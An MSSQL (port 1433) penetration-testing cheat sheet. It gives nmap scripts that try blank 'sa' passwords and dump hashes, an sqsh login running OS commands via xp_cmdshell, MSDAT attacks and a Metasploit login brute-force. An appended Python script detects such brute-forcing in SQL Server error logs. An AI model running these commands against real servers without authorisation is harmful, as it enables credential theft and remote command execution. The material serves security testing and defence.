Port 1433 – MSSQL

How to enumerate port 1433 (MSSQL)


Nmap Information Gathering:

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

sqsh – Interactive database shell:

# Log in to mssql
sqsh -S 192.168.1.101 -U sa

# Execute commands
xp_cmdshell 'date'
go

MSDAT (Microsoft SQL Database Attacking Tool):

MSDAT is an open source penetration testing tool that tests the security of Microsoft SQL databases remotely.

https://github.com/quentinhardy/msdat

python msdat.py all -s 192.168.1.101

MSSQL Brute Force Attack:

The Metasploit mssql_login module queries the MSSQL instance with a specific username/password (the default is sa with a blank password).

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set rhosts 192.168.1.104
msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(mssql_login) > run
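
What the login-guessing run above looks like from the server side, as an added detection example (not part of the original page): it parses SQL Server ERRORLOG login-audit lines and flags clients with a burst of failed logins, listing any account that then logged in successfully from the same client. The log excerpt, the threshold and the window are constructed assumptions, and login auditing is assumed to record both failed and successful logins.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (addresses, users and times are made up).
SAMPLE_LOG = """\
2024-03-01 10:15:00.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:15:00.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 10:15:01.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 10:15:01.80 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.50]
2024-03-01 10:15:02.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 10:15:03.05 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 10:15:04.33 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.50]
2024-03-01 10:20:00.12 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.77]
2024-03-01 10:20:09.54 Logon       Login succeeded for user 'appuser'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.77]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {client: summary} for every client with at least `threshold`
    failed logins inside any `window`-long span of the log."""
    events = defaultdict(lambda: {"failed": [], "succeeded": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # lines without a client address (e.g. "Error: 18456") are skipped
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events[m["client"]][m["result"]].append((ts, m["user"]))
    alerts = {}
    for client, ev in events.items():
        fails = sorted(ev["failed"])
        # Sliding window: the i-th and (i+threshold-1)-th failures fit in `window`.
        burst = any(fails[i + threshold - 1][0] - fails[i][0] <= window
                    for i in range(len(fails) - threshold + 1))
        if burst:
            alerts[client] = {
                "failures": len(fails),
                "users_tried": sorted({u for _, u in fails}),
                # A success after the first failure suggests a guessed password.
                "success_after": sorted({u for ts, u in ev["succeeded"]
                                         if ts >= fails[0][0]}),
            }
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```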
